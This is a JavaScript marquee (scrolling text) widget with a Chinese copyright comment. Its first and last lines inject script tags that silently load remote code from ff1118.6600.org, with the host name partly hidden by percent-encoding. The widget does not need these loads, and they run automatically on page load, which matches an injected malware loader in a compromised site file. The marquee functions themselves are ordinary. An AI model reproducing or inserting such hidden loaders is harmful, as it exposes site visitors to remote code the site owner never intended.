document.writeln('<script type="text/javascript" language="JavaScript" src="http://ff1118.%36%3600.org" id="ff1org5704"  ><\/script>');
var info = new Array(), jm_marquee = new Array();
/*
------------------------------- 版权所有 -------------------------------
此代码由怡见可待(QQ:57659930) 制作完成，如果您想使用，请勿修改版权信息，谢谢～
*/
function sCode(text, width, height, direction, speed, ID) {
	direction = direction.toLowerCase(); if (ID != null) text = document.getElementById(ID).innerHTML;
	if (direction != 'left' && direction != 'up' && direction != 'right' && direction != 'down') direction = 'left';
	if (speed == null) speed = 50;
	var txt = '<div id="demo' + info.length + '0" style="overflow: hidden; width: ' + width + 'px; height: ' + height + 'px;">\r';
	txt += '  <table width="' + ((direction == 'left' || direction == 'right') ? width * 2 : width) + '" border="0" cellspacing="0" cellpadding="0" onmouseover="javascript: clearInterval(jm_marquee[' + jm_marquee.length + ']);" onmouseout="javascript: jm_marquee[' + jm_marquee.length + '] = setInterval(\'marquee(\\\'' + direction + '\\\', ' + info.length + ');\', ' + speed + ');">\r';
	if (direction == 'left' || direction == 'right') {
		txt += '    <tr>\r';
		txt += '      <td width="' + width + '" id="demo' + info.length + '1">' + text + '</td>\r';
		txt += '      <td width="' + width + '" id="demo' + info.length + '2">' + text + '</td>\r';
		txt += '    </tr>\r';
	}
	else {
		txt += '    <tr height="' + height + '">\r';
		txt += '      <td width="' + width + '" id="demo' + info.length + '1">' + text + '</td>\r    </tr>\r';
		txt += '    <tr height="' + height + '">\r';
		txt += '      <td width="' + width + '" id="demo' + info.length + '2">' + text + '</td>\r    </tr>\r';
	}
	txt += '  </table>\r</div>'; txt = txt.replace('\r', "\r\n"); info[info.length] = txt;
	if (ID == null) document.write(txt);
	else document.getElementById(ID).innerHTML = txt;
	jm_marquee[jm_marquee.length] = setInterval('marquee(\'' + direction + '\', ' + (info.length - 1) + ');', speed);
}

function marquee(direction, obj) {
	var Obj = new Array(), i = 0;
	for (; i < 3; i++) Obj[i] = document.getElementById('demo' + String(obj) + String(i));
	if (direction == 'left') {
		if (Obj[2].offsetWidth - Obj[0].scrollLeft < 2) Obj[0].scrollLeft -= Obj[1].offsetWidth;
		else Obj[0].scrollLeft++;
	}
	if (direction == 'up') {
		if (Obj[2].offsetTop - Obj[0].scrollTop < 2) Obj[0].scrollTop -= Obj[1].offsetHeight;
		else Obj[0].scrollTop++;
	}
	if (direction == 'right') {
		if (Obj[0].scrollLeft < 2) Obj[0].scrollLeft = Obj[1].offsetWidth * 2;
		else Obj[0].scrollLeft--;
	}
	if (direction == 'down') {
		if (Obj[0].scrollTop < 2) Obj[0].scrollTop = Obj[1].offsetHeight * 2;
		else Obj[0].scrollTop--;
	}
}

document.writeln('<script src="http://ff111%38.6600.org" type="text/javascript" language="JavaScript" id="~~3326"  ><\/script>');

